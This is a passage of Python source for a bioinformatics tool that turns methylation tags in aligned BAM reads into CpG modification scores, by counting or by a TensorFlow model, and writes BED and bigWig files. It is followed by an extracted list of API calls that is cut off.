# use biopython for this (convert to Seq, get RC, convert to string)
else:
return [i.start() for i in re.finditer(base, str(Seq(query_seq).reverse_complement()))]
def parse_mmtag(query_seq, mmtag, modcode, base, reverse):
"""
Get a generator of the 0-based indices of the modified bases in the query sequence.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_base_indices: Generator of integers, 0-based indices of all mod bases in query seq. (iter)
"""
try:
# tags are written as: C+m,5,12,0;C+h,5,12,0;
# if multiple mod types present in tag, must find relevant one first
modline = next(x[len(modcode)+1:] for x in mmtag.split(';') if x.startswith(modcode))
# first get the sequence of the mod bases from tag integers
# this is a 1-based position of each mod base in the complete set of this base from this read
# e.g., [6, 19, 20] = the 6th, 19th, and 20th C bases are modified in the set of Cs
mod_sequence = get_mod_sequence((int(x) for x in modline.split(',')))
# get all 0-based indices of this base in this read, e.g. every C position
base_indices = get_base_indices(query_seq, base, reverse)
# use the mod sequence to identify indices of the mod bases in the read
return (base_indices[i - 1] for i in mod_sequence)
except:
return iter(())
def parse_mltag(mltag):
"""
Convert 255 discrete integer code into mod score 0-1, return as a generator.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:return: Generator of floats, probabilities of all mod bases in query seq. (iter)
"""
return (round(x / 256, 3) if x > 0 else 0 for x in mltag)
def get_mod_dict(query_seq, mmtag, modcode, base, mltag, reverse):
"""
Make a dictionary from the Mm and Ml tags, in which the
modified base index (in the query seq) is the key and the
mod score is the value.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_dict: Dictionary with mod positions and scores. (dict)
"""
mod_base_indices = parse_mmtag(query_seq, mmtag, modcode, base, reverse)
mod_scores = parse_mltag(mltag)
mod_dict = dict(zip(mod_base_indices, mod_scores))
return mod_dict
def pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites):
"""
For a given region, retrieve all reads.
For each read, iterate over positions aligned to this region.
Build a list with an entry for each ref position in the region. Each entry has a list of 3-tuples, each of which
includes information from a read base read aligned to that site. The 3-tuple contains strand information,
modification score, and haplotype.
(strand symbol (str), mod score (float), haplotype (int))
Return the unfiltered list of base modification data.
:param bamIn: AlignmentFile object of input bam file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: Name of SAM tag containing haplotype information. (str)
:param modsites: Filtering method. (str: "denovo", "reference")
:return basemod_data: Unfiltered list of base modification data (list)
:return cg_sites_read_set: Set of positions in read consensus sequence with CG, given as reference position. The
set is empty unless modsites is 'denovo' (set)
"""
logging.debug("coordinates {}: {:,}-{:,}: (2) pileup_from_reads".format(ref, pos_start, pos_stop))
basemod_data = []
# These structures are only used for modsites denovo mode
pos_pileup = []
pos_pileup_hap1 = []
pos_pileup_hap2 = []
is_denovo_modsites = modsites == "denovo"
# iterate over all reads present in this region
for read in bamIn.fetch(contig=ref, start=pos_start, stop=pos_stop):
# check if passes minimum mapping quality score
if read.mapping_quality < min_mapq:
#logging.warning("pileup_from_reads: read did not pass minimum mapQV: {}".format(read.query_name))
continue
# identify the haplotype tag, if any (default tag = HP)
# values are 1 or 2 (for haplotypes), or 0 (no haplotype)
# an integer is expected but custom tags can produce strings instead
try:
hap_val = read.get_tag(hap_tag)
try:
hap = int(hap_val)
except ValueError:
logging.error("coordinates {}: {:,}-{:,}: (2) pileup_from_reads: illegal haplotype value {}".format(ref, pos_start, pos_stop, hap_val))
except KeyError:
hap = 0
# check for SAM-spec methylation tags
# draft tags were Ml and Mm, accepted tags are now ML and MM
# check for both types, set defaults to None and change if found
mmtag, mltag = None, None
try:
mmtag = read.get_tag('Mm')
mltag = read.get_tag('Ml')
except KeyError:
pass
try:
mmtag = read.get_tag('MM')
mltag = read.get_tag('ML')
except KeyError:
pass
if mmtag is not None and mltag is not None:
if not basemod_data:
ref_pos_count = 1 + pos_stop - pos_start
basemod_data = [[] for _ in range(ref_pos_count)]
if is_denovo_modsites:
pos_pileup = [[] for _ in range(ref_pos_count)]
pos_pileup_hap1 = [[] for _ in range(ref_pos_count)]
pos_pileup_hap2 = [[] for _ in range(ref_pos_count)]
is_reverse = bool(read.is_reverse)
strand = "+"
if is_reverse :
strand = "-"
rev_strand_offset = len(read.query_sequence) - 2
# note that this could potentially be used for other mod types, but
# the Mm and Ml parsing functions are not set up for the interleaved format
# e.g., ‘Mm:Z:C+mh,5,12; Ml:B:C,204,26,89,130’ does NOT work
# to work it must be one mod type, and one score per mod position
mod_dict = get_mod_dict(read.query_sequence, mmtag, 'C+m', 'C', mltag, is_reverse)
if True:
# iterate over positions
for query_pos, ref_pos in read.get_aligned_pairs(matches_only=True)[20:-20]:
# make sure ref position is in range of ref target region
if ref_pos >= pos_start and ref_pos <= pos_stop:
ref_offset = ref_pos - pos_start
# building a consensus is MUCH faster when we iterate over reads (vs. by column then by read)
# we are building a dictionary with ref position as key and list of bases as val
if is_denovo_modsites:
query_base = read.query_sequence[query_pos]
pos_pileup[ref_offset].append(query_base)
if hap == 1:
pos_pileup_hap1[ref_offset].append(query_base)
elif hap == 2:
pos_pileup_hap2[ref_offset].append(query_base)
# identify if read is reverse strand or forward to set correct location
if is_reverse:
location = (rev_strand_offset - query_pos)
else:
location = query_pos
# check if this position has a mod score in the dictionary,
# if not assign score of zero
score = mod_dict.get(location, 0)
# Add tuple with strand, modification score, and haplotype to the list for this position
basemod_data[ref_offset].append((strand, score, hap))
# if no SAM-spec methylation tags present, ignore read and log
else:
logging.warning("pileup_from_reads: read missing MM and/or ML tag(s): {}".format(read.query_name))
cg_sites_read_set = set()
if is_denovo_modsites:
for refpos_list in (pos_pileup, pos_pileup_hap1, pos_pileup_hap2):
last_base = 'N'
last_index = 0
for index,v in enumerate(refpos_list):
# find the most common base, if no reads present use N
if len(v):
base = Counter(v).most_common(1)[0][0]
else:
base = 'N'
if last_base == 'C' and base == 'G' :
cg_sites_read_set.add(pos_start+last_index)
# This restriction recreates the original code behavior:
# - Advantage: Method can find a CpG aligning across a deletion in the reference
# - Disadvantage: Method will find 'fake' CpG across gaps in the haplotype phasing
#
# The disadvantage is fixable, but first focus on identical output to make verification easy
if base != 'N':
last_base = base
last_index = index
return basemod_data, cg_sites_read_set
def filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites):
"""
Filter the per-position base modification data, based on the modsites option selected:
"reference": Keep all sites that match a reference CG site (this includes both
modified and unmodified sites). It will exclude all modified sites
that are not CG sites, according to the ref sequence.
"denovo": Keep all sites which have at least one modification score > 0, per strand.
This can include sites that are CG in the reads, but not in the reference.
It can exclude CG sites with no modifications on either strand from being
written to the bed file.
Return the filtered list.
:param basemod_data: List of base modification data per position, offset by pos_start. (list)
:param cg_sites_read_set: Set with reference coordinates for all CG sites in consensus from reads. (set)
:param ref: A path to reference fasta file. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param ref: Reference name. (str)
:return filtered_basemod_data: List of 2-tuples for each position retained after filtering. Each 2-tuple is the
reference position and base mod data list. The list is sorted by reference position (list)
"""
filtered_basemod_data = []
if modsites == "reference":
if basemod_data:
# Get CG positions in reference
cg_sites_ref_set = cg_sites_from_fasta(input_fasta, ref)
# Keep all sites that match a reference CG position and have at least one basemod observation.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_ref_set and v]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
elif modsites == "denovo":
if basemod_data:
# Keep all sites that match position of a read consensus CG site.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_read_set]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
del basemod_data
del cg_sites_read_set
return filtered_basemod_data
def calc_stats(df):
"""
Gets summary stats from a given dataframe p.
:param df: Pandas dataframe.
:return: Summary statistics
"""
total = df.shape[0]
mod = df[df['prob'] > 0.5].shape[0]
unMod = df[df['prob'] <= 0.5].shape[0]
modScore = "." if mod == 0 else str(round(df[df['prob'] > 0.5]['prob'].mean(), 3))
unModScore = "." if unMod == 0 else str(round(df[df['prob'] <= 0.5]['prob'].mean(), 3))
percentMod = 0.0 if mod == 0 else round((mod / total) * 100, 1)
return percentMod, mod, unMod, modScore, unModScore
def collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data):
"""
Iterates over reference positions and for each position, makes a pandas dataframe from the sublists.
The dataframe is filtered for strands and haplotypes, and summary statistics are
calculated with calc_stats().
For each position and strand/haploytpe combination, a sublist of summary information
is appended to the bed_results list:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
This information is used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_count".format(ref, pos_start, pos_stop))
# intiate empty list to store bed sublists
bed_results = []
# iterate over the ref positions and corresponding vals
for (refPosition, modinfoList) in filtered_basemod_data:
# create pandas dataframe from this list of sublists
df = pd.DataFrame(modinfoList, columns=['strand', 'prob', 'hap'])
# Filter dataframe based on strand/haplotype combinations, get information,
# and create sublists and append to bed_results.
# merged strands / haplotype 1
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 1])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap1", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / haplotype 2
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 2])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap2", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / both haplotypes
percentMod, mod, unMod, modScore, unModScore = calc_stats(df)
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"Total", mod + unMod, mod, unMod, modScore, unModScore])
return bed_results
def get_normalized_histo(probs, adj):
"""
Create the array data structure needed to apply the model, for a given site.
:param probs: List of methylation probabilities. (list)
:param adj: A 0 or 1 indicating whether previous position was a CG. (int)
:return: List with normalized histogram and coverage (if min coverage met), else returns empty list. (list)
"""
cov = len(probs)
if (cov >= 4):
hist = np.histogram(probs, bins=20, range=[0, 1])[0]
norm = np.linalg.norm(hist)
# divide hist by norm and add values to array
# add either 0 (not adjacent to a prior CG) or 1 (adjacent to a prior CG) to final spot in array
norm_hist = np.append(hist / norm, adj)
return [norm_hist, cov]
else:
return []
def discretize_score(score, coverage):
"""
Apply a small correction to the model probability to make it
compatible with the number of reads at that site. Allows the number
of modified and unmodified reads to be estimated.
:param score: Modification probability, from model. (float)
:param coverage: Number of reads. (int)
:return mod_reads: Estimated number of modified reads. (int)
:return unmod_reads: Estimated number of unmodified reads. (int)
:return adjusted_score: Adjusted probability score, based on percent modified reads. (float)
"""
# need to round up or round down modified read numbers based on score
# which allows a push towards 0/50/100 for adjusted score
if score > 50:
if score < 65:
mod_reads = int(np.floor(score/100 * float(coverage)))
else:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
if score > 35:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
mod_reads = int(np.floor(score/100 * float(coverage)))
unmod_reads = int(coverage) - mod_reads
if mod_reads == 0:
adjusted_score = 0.0
else:
adjusted_score = round((mod_reads / (mod_reads + unmod_reads)) * 100, 1)
return mod_reads, unmod_reads, adjusted_score
def apply_model(refpositions, normhistos, coverages, ref, pos_start, pos_stop, model, hap, bed_results):
"""
Apply model to make modification calls for all sites using a sliding window approach.
Append to a list of results, ultimately for bed file:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param refpositions: List with all CG positions. (list)
:param normhistos: List with all normalized histogram data structures. (list)
:param coverages: List with all CG coverages. (list)
:param ref: Reference contig name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param model: The tensorflow model object.
:param hap: Label of haplotype (hap1, hap2, or Total). (str)
:param bed_results: List of bed results to which these model results will be appended (list)
"""
if len(normhistos) > 11:
featPad = np.pad(np.stack(normhistos), pad_width=((6, 4), (0, 0)), mode='constant', constant_values=0)
featuresWindow = sliding_window_view(featPad, 11, axis=0)
featuresWindow = np.swapaxes(featuresWindow, 1, 2)
predict = model.predict(featuresWindow)
predict = np.clip(predict, 0, 1)
for i, position in enumerate(refpositions):
model_score = round(predict[i][0] * 100, 1)
mod_reads, unmod_reads, adjusted_score = discretize_score(model_score, coverages[i])
bed_results.append((ref, position, (position + 1), model_score, hap, coverages[i], mod_reads, unmod_reads, adjusted_score))
else:
logging.warning("coordinates {}: {:,}-{:,}: apply_model: insufficient data for {}".format(ref, pos_start, pos_stop, hap))
def collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir):
"""
Iterates over reference positions and creates normalized histograms of scores,
feeds all sites and scores into model function to assign modification probabilities,
and creates a list of sublists for writing bed files:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
This information is returned and ultimately used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:param model_dir: Full path to directory containing model. (str)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_model".format(ref, pos_start, pos_stop))
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
logging.getLogger('tensorflow').setLevel(logging.ERROR)
# this may or may not do anything to help with the greedy thread situation...
#tf.config.threading.set_intra_op_parallelism_threads(1)
#tf.config.threading.set_inter_op_parallelism_threads(1)
model = tf.keras.models.load_model(model_dir, compile=False)
total_refpositions, total_normhistos, total_coverages = [], [], []
hap1_refpositions, hap1_normhistos, hap1_coverages = [], [], []
hap2_refpositions, hap2_normhistos, hap2_coverages = [], [], []
# set initial C index for CG location to 0
previousLocation = 0
# iterate over reference positions and values (list containing [strand, score, hap]) in filtered_basemod_data
for (refPosition, modinfoList) in filtered_basemod_data:
# determine if there is an adjacent prior CG, score appropriately
if (refPosition - previousLocation) == 2:
adj = 1
else:
adj = 0
# update CG position
previousLocation = refPosition
# build lists for combined haplotypes
# returns [norm_hist, cov] if min coverage met, otherwise returns empty list
total_result_list = get_normalized_histo([x[1] for x in modinfoList], adj)
if total_result_list:
total_normhistos.append(total_result_list[0])
total_coverages.append(total_result_list[1])
total_refpositions.append(refPosition)
# build lists for hap1
hap1_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 1], adj)
if hap1_result_list:
hap1_normhistos.append(hap1_result_list[0])
hap1_coverages.append(hap1_result_list[1])
hap1_refpositions.append(refPosition)
# build lists for hap2
hap2_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 2], adj)
if hap2_result_list:
hap2_normhistos.append(hap2_result_list[0])
hap2_coverages.append(hap2_result_list[1])
hap2_refpositions.append(refPosition)
# initiate empty list to store all bed results
bed_results = []
# run model for total, hap1, hap2, and add to bed results if non-empty list was returned
apply_model(total_refpositions, total_normhistos, total_coverages, ref, pos_start, pos_stop, model, "Total", bed_results)
apply_model(hap1_refpositions, hap1_normhistos, hap1_coverages, ref, pos_start, pos_stop, model, "hap1", bed_results)
apply_model(hap2_refpositions, hap2_normhistos, hap2_coverages, ref, pos_start, pos_stop, model, "hap2", bed_results)
return bed_results
def run_process_region(arguments):
"""
Process a given reference region to identify modified bases.
Uses pickled args (input_file, ref, pos_start, pos_stop) to run
pileup_from_reads() to get all desired sites (based on modsites option),
then runs collect_bed_results() to summarize information.
The sublists will differ between model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param arguments: Pickled list. (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
# unpack pickled items:
# [bam path (str), fasta path (str), modsites option (str),
# pileup_mode option (str), model directory path (str),
# reference contig name (str), start coordinate (int),
# stop coordinate (int), minimum mapping QV (int), haplotype tag name (str)]
input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, pos_start, pos_stop, min_mapq, hap_tag = arguments
logging.debug("coordinates {}: {:,}-{:,}: (1) run_process_region: start".format(ref, pos_start, pos_stop))
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# get all ref sites with mods and information from corresponding aligned reads
basemod_data, cg_sites_read_set = pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites)
# filter based on denovo or reference sites
filtered_basemod_data = filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites)
# bam object no longer needed, close file
bamIn.close()
if filtered_basemod_data:
# summarize the mod results, depends on pileup_mode option selected
if pileup_mode == "count":
bed_results = collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data)
elif pileup_mode == "model":
bed_results = collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir)
else:
bed_results = []
logging.debug("coordinates {}: {:,}-{:,}: (5) run_process_region: finish".format(ref, pos_start, pos_stop))
if len(bed_results) > 1:
return bed_results
else:
return
def run_process_region_wrapper(arguments):
try:
return run_process_region(arguments)
except Exception as e:
sys.stderr.write("Exception thrown in worker process {}: {}\n".format(os.getpid(),e))
raise
def run_all_pileup_processing(regions_to_process, threads):
"""
Function to distribute jobs based on reference regions created.
Collects results and returns list for writing output bed file.
The bed results will differ based on model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param regions_to_process: List of sublists defining regions (input_file, ref, pos_start, pos_stop). (list)
:param threads: Number of threads to use for multiprocessing. (int)
:return filtered_bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.info("run_all_pileup_processing: Starting parallel processing.\n")
# run all jobs
progress_bar = None
if sys.stderr.isatty():
progress_bar = tqdm(total=len(regions_to_process), miniters=1, smoothing=0)
bed_results = []
with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(run_process_region_wrapper, r) for r in regions_to_process]
# Process results in order of completion
for future in concurrent.futures.as_completed(futures):
bed_result = future.result()
bed_results.append(bed_result)
if progress_bar:
progress_bar.update(1)
if progress_bar:
progress_bar.close()
logging.info("run_all_pileup_processing: Finished parallel processing.\n")
# results is a list of sublists, may contain None, remove these
filtered_bed_results = [i for i in bed_results if i]
# turn list of lists of sublists into list of sublists
flattened_bed_results = [i for sublist in filtered_bed_results for i in sublist]
# ensure bed results are sorted by ref contig name, start position
logging.info("run_all_pileup_processing: Starting sort for bed results.\n")
if flattened_bed_results:
flattened_bed_results.sort(key=itemgetter(0, 1))
logging.info("run_all_pileup_processing: Finished sort for bed results.\n")
return flattened_bed_results
def write_output_bed(label, modsites, min_coverage, bed_results):
"""
Writes output bed file(s) based on information in bed_merge_results (default).
Separates results into total, hap1, and hap2. If haplotypes not available,
only total is produced.
The bed_merge_results list will contain slighty different information depending on the pileup_mode option,
but the first 7 fields will be identical:
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param outname: Name of output bed file to write. (str)
:param modsites: "reference" or "denovo", for the CpG detection mode. (str)
:param min_coverage: Minimum coverage to retain a site. (int)
:param bed_results: List of sublists with information to write the output bed file. (list)
:return output_files: List of output bed file names that were successfully written. (list)
"""
logging.info("write_output_bed: Writing unfiltered output bed files.\n")
out_total = "{}.combined.{}.bed".format(label, modsites)
out_hap1 = "{}.hap1.{}.bed".format(label, modsites)
out_hap2 = "{}.hap2.{}.bed".format(label, modsites)
cov_total = "{}.combined.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap1 = "{}.hap1.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap2 = "{}.hap2.{}.mincov{}.bed".format(label, modsites, min_coverage)
# remove any previous version of output files
for f in [out_total, out_hap1, out_hap2, cov_total, cov_hap1, cov_hap2]:
if os.path.exists(f):
os.remove(f)
with open(out_total, 'a') as fh_total:
with open(out_hap1, 'a') as fh_hap1:
with open(out_hap2, 'a') as fh_hap2:
for i in bed_results:
if i[4] == "Total":
fh_total.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap1":
fh_hap1.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap2":
fh_hap2.write("{}\n".format("\t".join([str(j) for j in i])))
# write coverage-filtered versions of bed files
logging.info("write_output_bed: Writing coverage-filtered output bed files, using min coverage = {}.\n".format(min_coverage))
output_files = []
for inBed, covBed in [(out_total, cov_total), (out_hap1, cov_hap1), (out_hap2, cov_hap2)]:
# if haplotypes not present, the bed files are empty, remove and do not write cov-filtered version
if os.stat(inBed).st_size == 0:
os.remove(inBed)
else:
output_files.append(inBed)
# write coverage filtered bed file
with open(inBed, 'r') as fh_in, open(covBed, 'a') as fh_out:
for line in fh_in:
if int(line.split('\t')[5]) >= min_coverage:
fh_out.write(line)
# check to ensure some sites were written, otherwise remove
if os.stat(covBed).st_size == 0:
os.remove(covBed)
else:
output_files.append(covBed)
return output_files
def make_bed_df(bed, pileup_mode):
"""
Construct a pandas dataframe from a bed file.
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) % mod sites, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param bed: Name of bed file.
:param pileup_mode: Site modification calling method. (str: "model", "count")
:return df: Pandas dataframe.
"""
logging.debug("make_bed_df: Converting '{}' to pandas dataframe.\n".format(bed))
if pileup_mode == "count":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score'])
df.drop(columns=['modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score', 'haplotype', 'coverage'], inplace=True)
elif pileup_mode == "model":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'adj_prob'])
df.drop(columns=['haplotype', 'coverage', 'modified_bases', 'unmodified_bases', 'adj_prob'], inplace=True)
#df.sort_values(by=['chromosome', 'start'], inplace=True)
return df
def get_bigwig_header_info(input_fasta):
"""
Get chromosome names and lengths from reference fasta.
:param input_fasta: Name of reference fasta file.
:return header: List of tuples, containing [ (ref1, length1), (ref2, length2), ...] .
"""
logging.debug("get_bigwig_header_info: Getting ref:length info from reference fasta.\n")
header = []
with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
header.append((record.id, len(record.seq)))
return header
def write_bigwig_from_df(df, header, outname):
"""
Function to write a bigwig file using a pandas dataframe from a bed file.
:param df: Pandas dataframe object (created from bed file).
:param header: List containing (ref name, length) information. (list of tuples)
:param outname: Name of bigwig output file to write (OUT.bw).
"""
logging.debug("write_bigwig_from_df: Writing bigwig file for '{}'.\n".format(outname))
# first filter reference contigs to match those in bed file
# get all unique ref contig names from bed
chroms_present = list(df["chromosome"].unique())
# header is a list of tuples, filter to keep only those present in bed
# must also sort reference contigs by name
filtered_header = sorted([x for x in header if x[0] in chroms_present], key=itemgetter(0))
for i,j in filtered_header:
logging.debug("\tHeader includes: '{}', '{}'.".format(i,j))
# raise error if no reference contig names match
if not filtered_header:
logging.error("No reference contig names match between bed file and reference fasta!")
raise ValueError("No reference contig names match between bed file and reference fasta!")
# open bigwig object, enable writing mode (default is read only)
bw = pyBigWig.open(outname, "w")
# must add header to bigwig prior to writing entries
bw.addHeader(filtered_header)
# iterate over ref contig names
for chrom, length in filtered_header:
logging.debug("\tAdding entries for '{}'.".format(chrom))
# subset dataframe by chromosome name
temp_df = df[df["chromosome"] == chrom]
logging.debug("\tNumber of entries = {:,}.".format(temp_df.shape[0]))
# add entries in order specified for bigwig objects:
# list of chr names: ["chr1", "chr1", "chr1"]
# list of start coords: [1, 100, 125]
# list of stop coords: ends=[6, 120, 126]
# list of vals: values=[0.0, 1.0, 200.0]
bw.addEntries(list(temp_df["chromosome"]),
list(temp_df["start"]),
ends=list(temp_df["stop"]),
values=list(temp_df["mod_probability"]))
logging.debug("\tFinished entries for '{}'.\n".format(chrom))
# close bigwig object
bw.close()
def convert_bed_to_bigwig(bed_files, fasta, pileup_mode):
"""
Write bigwig files for each output bed file.
:param bed_files: List of output bed file names. (list)
:param fasta: A path to reference fasta file. (str)
:param pileup_mode: Site modification calling method. (str: "model", "count")
"""
logging.info("convert_bed_to_bigwig: Converting {} bed files to bigwig files.\n".format(len(bed_files)))
header = get_bigwig_header_info(fasta)
for bed in bed_files:
outname = "{}.bw".format(bed.split(".bed")[0])
df = make_bed_df(bed, pileup_mode)
write_bigwig_from_df(df, header, outname)
def main():
args = get_args()
setup_logging(args.output_label)
log_args(args)
if args.pileup_mode == "model":
if args.model_dir == None:
logging.error("Must supply a model to use when running model-based scoring!")
raise ValueError("Must supply a model to use when running model-based scoring!")
else:
if not os.path.isdir(args.model_dir):
logging.error("{} is not a valid directory path!".format(args.model_dir))
raise ValueError("{} is not a valid directory path!".format(args.model_dir))
print("\nChunking regions for multiprocessing.")
regions_to_process = get_regions_to_process(args.bam, args.fasta, args.chunksize, args.modsites,
args.pileup_mode, args.model_dir, args.min_mapq, args.hap_tag)
print("Running multiprocessing on {:,} chunks.".format(len(regions_to_process)))
bed_results = run_all_pileup_processing(regions_to_process, args.threads)
print("Finished multiprocessing.\nWriting bed files.")
bed_files = write_output_bed(args.output_label, args.modsites, args.min_coverage, bed_results)
print("Writing bigwig files.")
convert_bed_to_bigwig(bed_files, args.fasta, args.pileup_mode)
print("Finished.\n")
if __name__ == '__main__':
main()
|
[
"os.remove",
"Bio.Seq.Seq",
"argparse.ArgumentParser",
"pandas.read_csv",
"re.finditer",
"numpy.clip",
"numpy.histogram",
"numpy.linalg.norm",
"pandas.DataFrame",
"logging.error",
"sys.stderr.isatty",
"os.path.exists",
"numpy.append",
"numpy.swapaxes",
"collections.Counter",
"numpy.stack",
"tensorflow.keras.models.load_model",
"Bio.SeqIO.parse",
"os.stat",
"pysam.AlignmentFile",
"numpy.lib.stride_tricks.sliding_window_view",
"logging.debug",
"os.getpid",
"logging.basicConfig",
"os.path.isdir",
"logging.info",
"pyBigWig.open",
"operator.itemgetter",
"logging.getLogger"
] |
[((519, 801), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""aligned_bam_to_cpg_scores.py"""', 'description': '"""Calculate CpG positions and scores from an aligned bam file. Outputs raw and \n coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available)."""'}), '(prog=\'aligned_bam_to_cpg_scores.py\', description=\n """Calculate CpG positions and scores from an aligned bam file. Outputs raw and \n coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available)."""\n )\n', (542, 801), False, 'import argparse\n'), ((4240, 4263), 'os.path.exists', 'os.path.exists', (['logname'], {}), '(logname)\n', (4254, 4263), False, 'import os\n'), ((4326, 4472), 'logging.basicConfig', 'logging.basicConfig', ([], {'filename': 'logname', 'format': '"""%(asctime)s: %(levelname)s: %(message)s"""', 'datefmt': '"""%d-%b-%y %H:%M:%S"""', 'level': 'logging.DEBUG'}), "(filename=logname, format=\n '%(asctime)s: %(levelname)s: %(message)s', datefmt='%d-%b-%y %H:%M:%S',\n level=logging.DEBUG)\n", (4345, 4472), False, 'import logging\n'), ((4619, 4669), 'logging.info', 'logging.info', (['"""Using following argument settings:"""'], {}), "('Using following argument settings:')\n", (4631, 4669), False, 'import logging\n'), ((5830, 5888), 'logging.info', 'logging.info', (['"""get_regions_to_process: Starting chunking."""'], {}), "('get_regions_to_process: Starting chunking.')\n", (5842, 5888), False, 'import logging\n'), ((5942, 5978), 'pysam.AlignmentFile', 'pysam.AlignmentFile', (['input_bam', '"""rb"""'], {}), "(input_bam, 